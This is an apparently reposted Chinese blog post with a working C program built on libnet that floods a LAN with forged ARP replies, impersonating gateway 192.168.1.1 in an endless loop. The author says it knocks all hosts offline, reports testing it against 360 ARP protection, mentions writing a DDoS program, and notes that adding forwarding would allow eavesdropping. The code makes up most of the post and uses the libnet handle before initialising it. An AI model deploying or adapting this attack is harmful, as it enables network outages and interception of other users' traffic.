Linux下使用libnet实现ARP攻击

最新推荐文章于 2023-01-13 20:15:51 发布
最新推荐文章于 2023-01-13 20:15:51 发布
阅读量142 收藏 1
点赞数
文章标签: python
原文链接:https://my.oschina.net/jiyufei/blog/179494
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

    闲来无事,用libnet写了个简单的ARP攻击。以前感觉ARP攻击不是特别常见,不过最近工作中倒是遇到过两次ARP欺骗的事件。其实ARP欺骗的原理灰常简单滴,大部分都是在局域网中发送伪造的ARP广播包, 广播包的目的是干嘛呢?很简单,欺骗内网的所有主机,告诉受害主机,“我”是网关。 内网机器接收到这种广播包之后,会刷新自己ARP缓存表,把网关的IP和广播包中的源MAC绑定。这样攻击机器就达到了冒充网关的目的。

    上次一所大学就是被ARP欺骗攻击,他们的学校主页一打开就会跳出其他很多乱七八糟的页面,,,,当时查看他们WEB服务器的源代码,发现没有被插入这些<iframe>会弹页面的代码,但是用浏览器外网访问的时候,这些代码就出现了,很明显网站的返回的客户端数据在途中被劫持修改了(插入了一些代码)。

    下面实现的就比较简单了,只做欺骗,不做转发,导致的后果就是局域网所有主机会断网。测试了一下,内网主机会无法上网,安了360ARP防护的会报警,能上网,就是网速有点慢,但是识别出了的攻击主机好像不准确,试了几次都识别成正常的电脑在攻击,不知道360这个识别是不是通过源MAC地址识别还是怎么识别。 


#include "arp.h"

int main(int argc,char **argv){
	libnet_t *l;
	int i,packet_size;		//发送的数据包的长度
	libnet_ptag_t arp_tag,ether_tag;
	char *device="eth0";
	char err_buf[LIBNET_ERRBUF_SIZE];
	char *destion_ip_str = "255.255.255.255";
	char *source_ip_str = "192.168.1.1";
	u_char source_hardware[6]={0x00,0x0c,0x29,0x68,0x95,0x84};
	u_char destion_hardware[6]={0xff,0xff,0xff,0xff,0xff,0xff};
	u_int32_t source_ip,destion_ip;
	//将字符形式ip转换为网络字节序
	source_ip = libnet_name2addr4(l,source_ip_str,LIBNET_RESOLVE);
	destion_ip = libnet_name2addr4(l,destion_ip_str,LIBNET_RESOLVE);
	//初始化libnet句柄
	l = libnet_init(LIBNET_LINK,device,err_buf);
	if(l == NULL){
		printf("初始化libnet句柄失败:%s\n",err_buf);
		exit(-1);
	}
	arp_tag = libnet_build_arp(
		ARPHRD_ETHER,		//硬件地址类型,此处为以太网类型
		ETHERTYPE_IP,		//协议地址类型
		6,
		4,
		ARPOP_REPLY,		//ARP应答
		source_hardware,
		(u_int8_t *)&source_ip,
		destion_hardware,
		(u_int8_t *)&destion_ip,
		NULL,		//无负载
		0,			//负载长度为0
		l,
		0		//协议块标记,为0,表示新建协议块
		);
	ether_tag = libnet_build_ethernet(
		(u_int8_t *)&destion_hardware,
		(u_int8_t *)&source_hardware,
		ETHERTYPE_ARP,
		NULL,
		0,
		l,
		0
		);
	i = 0;
	while(1){
		packet_size = libnet_write(l);		//发送构造的ARP数据包
		usleep(10);
		i++;
	}
	printf("数据包长度为:%d\n",packet_size);
	libnet_destroy(l);
	return 0;
}



   目标MAC为广播地址,全0xff就行,源MAC地址可以为本机MAC或者随便伪造的MAC(在程序中获取本机MAC可用ioctl函数,最近在写DDOS攻击程序就是用ioctl获取本机MAC和IP的),注意ARP包类型为ARPOP_REPLY(应答包)。

    如果不想弄断网,只进行欺骗的话,数据发送过来之后,要进行转发到正确的网关,这样就保证内网网络正常,而且所有数据都被监听了(人太懒,不想写)~~~ 

转载于:https://my.oschina.net/jiyufei/blog/179494

weixin_34294649
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用libnet构造ARP响应包
学无止境
10-31 1279
//编译方式gcc arp.c -lnet //arp.c #include stdio.h>#include libnet.h>#define MAC_ADDR_LEN 6#define IP_ADDR_LEN 4//向同一网络内所有机器发送ARP REPLY包,告诉他们,23.23.23.2Z在00:df:17:17:17:f2那里int main(int argc, char *argv
Ubuntu下C语言+libnet实现ARP数据包广播
阿信的专栏
06-07 5393
     先说一下相关的“废话”:     近来学校宿舍楼ARP攻击一直很猖獗,而且大多数是主机欺骗型ARP攻击。每次攻击都要至少半天整栋宿舍楼上不去网(我们这边每栋宿舍楼划分一个网段,像我们楼就是10.1..23.254/22)。我曾经抓到过ARP攻击数据包,局域网遭受攻击的时候被我逮了个正着:某台主机广播一个ARP数据包,内容是10.1.23.254 is at xxxxxxxx(即错误的
(C)libnet-ICMP攻击
weixin_33762130的博客
12-18 412
刚开始接到的任务是,要求主机A给主机B发送ICMP数据包,将源IP和目的IP都填成B的IP,使B接受自己给自己的ICMP回应包,如下图: 发现这样不足以对B产生影响,于是打算借助别的服务器,如下图: 后来才知道自己做的其实是ICMP攻击。 ICMP攻击分为三种方式: 1、直接flood 缺点:需要足够的带宽,而且容易暴露自己的IP。 2、伪造IP的Flood 3、反射...
libnet--arp/arp应答
程序狗的成长之路
08-14 747
ARP广播包: #include int main() {     libnet_t *handle;        /* Libnet句柄 */     int packet_size;     char *device = "eth0";   /* 设备名字,也支持点十进制的IP地址,会自己找到匹配的设备 */     u_int8_t *src_ip_str = "
libnet应用之arp包发送
weixin_33908217的博客
01-12 253
/************************************author hjjdate 2011-1-20function: send an arp packet to all machine on local netmodify: wenhaogcc arp.c -o arp -Wall -lnet**************************************/...
libnet和pcap模拟ARP
whutliubo的专栏
11-25 325
libnet和pcap模拟ARP1 #include 2 #include 3 #include 4 5 /* 6 * Check whether "cp" is a valid ascii representation 7 * of an MAC address and convert to a binary address. 8 * Returns 1 if the address is valid, 0 if not.
Linux使用libnet实现ARP攻击脚本原理分析以防被攻击
01-09
闲来无事,用libnet写了个简单的ARP攻击。以前感觉ARP攻击不是特别常见,不过最近工作中倒是遇到过两次ARP欺骗的事件。其实ARP欺骗的原理灰常简单滴,大部分都是在局域网中发送伪造的ARP广播包, 广播包的目的是干嘛...
ARPSpoofing、arp欺骗性攻击arpspoof源码分析
热门推荐
Bonjour~
03-18 1万+
ARPSpoofing 什么是ARP协议 一台主机和另一台主机通信,要知道目标的IP地址,但是在局域网传输的网卡却不能直接识别IP地址,所以用APR解析协议将IP地址解析成MAC地址。ARP协议的基本功能就是通过目标设备的IP地址,来查询设备的MAC地址。 在局域网的任意一台主机中,都有一个ARP缓存表,里面保存本机已知的此局域网中各主机和路由器的IP地址和MAC地址的对照表关系。ARP缓存表的生命周
基于libpcap的ARP欺骗工具
iteye_6223的博客
03-22 458
做这个工具的目的不是为了搞破坏,只是为了做防火墙测试。 由于需要模拟生产数据包,因此需要自己动手写ARP欺骗程序来回应防火墙的ARP询问。 这个程序会一直监听某个网卡,一收到ARP询问就通过rawsocket构造一个ARP回应包发送出去。 本程序有两个部分,一个是收包,基于libpcap;另一个是发包,不依赖任何第三方类库,直接通过rawsocket从链路层开始构造ARP包发出去。 #in...
使用libnet构造源mac持续更新的arp攻击程序
太郎之石的专栏
05-10 3328
1、开发使用libnet的版本为libnet-1.1.2.1,在编程之前要编译libnet.dll。编译libnet.dll成功之后,把libnet.lib引入库加到vc project菜单中setting目录下的object/library modules选项中.2、使用VC的向导建立一个win32 console的空白程序,然后主程序修改如下:// SendARP.cpp : Defines
【网络攻击手段之-----ARP欺骗】
最新发布
a1379292747的博客
01-13 1万+
本篇文章介绍了什么是ARP欺骗,并使用了代码来模拟ARP的欺骗攻击ARP 欺骗攻击是一种高危网络攻击,对网络安全造成严重威胁。因此,不应该对任何目标进行 ARP 欺骗攻击。做一个遵纪守法的公民,从我做起!!!ARP (Address Resolution Protocol) 是一种网络层协议,用于将 IP 地址转换为物理地址(MAC 地址)。在局域网中,每台设备都有唯一的 MAC 地址,而 IP 地址是可以重复分配的。因此,当一个设备需要发送数据到另一个设备时,它需要知道另一个设备的 MAC 地址。
Linux 网络编程—— libnet 使用指南
每天积累一点点
04-22 7967
概述 通过《原始套接字实例:发送 UDP 数据包》的学习,我们组 UDP 数据包时常考虑字节流顺序、校验和计算等问题,有时候会比较繁琐,那么,有没有一种更简单的方法呢?答案是:借助 libnet 函数库。 libnet 是一个小型的接口函数库,主要用 C 语言写成,提供了低层网络数据包的构造、处理和发送功能。 libnet 的开发目的是:建立一个简单统
[源码和文档分享]基于Libpcap实现的局域网嗅探抓包发包解析工具
qq_38474647的博客
12-12 349
第一章 需求分析 1.1 设计目的 1.1.1 基本要求 完成一个基于Libpcap的网络数据包解析软件,具有易用、美观的界面。 1.1.2 具体要求 能够解析本地或局域网的数据包,例如TCP包,UDP包,工CMP包等,能分析报头以及数据包内容 能分析数据包的版本、头长度、服务类型、数据包总长度、...
libnet发包例子(tcp udp arp广播)
梦想专栏
02-13 3380
TCP: #include int main() { libnet_t *handle; /* Libnet句柄 */ int packet_size; /* 构造的数据包大小 */ char *device = "eth0"; /* 设备名字,也支持点十进制的IP地址,会自己找到匹配的设备 */ char *src_ip_str = "192.168.2.1
linux下主机发现,llinux 下用libpcap发送ARP实现局域网内主机发现
weixin_28813357的博客
05-12 409
#include #define MAC_BCAST_ADDR (uint8_t *) "\xff\xff\xff\xff\xff\xff"#define ETHER_LEN sizeof(struct eth_header)#define ARP_LEN sizeof(struct arp_header)pcap_t* pcap_handle;char error_content[PCAP...
使用Libnet构造与发送网络数据包教程
"这篇资料主要介绍了如何使用libnet构造数据包,包括该库的基本功能、应用范围、支持的协议类型,以及在Linux环境下libnet和libpcap的安装过程。此外,还提到了tcpdump的使用方法和libnet的一些参考代码及文档位置。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值